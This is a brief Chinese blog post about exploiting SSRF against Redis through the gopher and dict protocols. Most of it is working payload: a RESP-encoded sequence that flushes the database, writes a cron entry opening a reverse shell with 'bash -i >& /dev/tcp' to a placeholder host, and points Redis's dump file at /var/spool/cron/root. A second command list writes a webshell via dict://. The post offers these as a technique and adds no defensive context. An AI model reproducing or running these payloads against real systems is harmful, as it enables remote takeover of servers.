ssrf打redis

Thu, 09 Jan 2025 02:06:46 +0800

SSRF打redis

思路：常见方法使用gopher和dict，执行redis命令，然后通过redis命令达到目的。

前置知识

RESP 协议

RESP 协议是 redis 服务之间数据传输的通信协议，redis 客户端和 redis 服务端之间通信会采取 RESP 协议因此我们后续构造 payload 时也需要转换成 RESP 协议的格式

*1
$8
flushall
*3
$3
set
$1
1
$64



*/1 * * * * bash -i >& /dev/tcp/xxxxxxx/xxx 0>&1







*4
$6
config
$3
set
$3
dir
$16
/var/spool/cron/
*4
$6
config
$3
set
$10
dbfilename
$4
root
*1
$4
save
quit

1.写shell

直接通过redis执行命令写文件。

 commands = [
 "flushall", #清空redis
 f'set:webshell:"{shellcode}"', #写入shell内容
 'set:dir:/scripts', #写入目录
 'set:dbfilename:visit.script', #设置镜像文件名
 "save" #保存写入
 ]

一般为：dict://<host>:<port>/info 探测端口应用信息执行命令：dict://<host>:<port>/命令:参数 冒号相当于空格

2025 on chleynx's blog

ssrf打redis

SSRF打redis

前置知识

1.写shell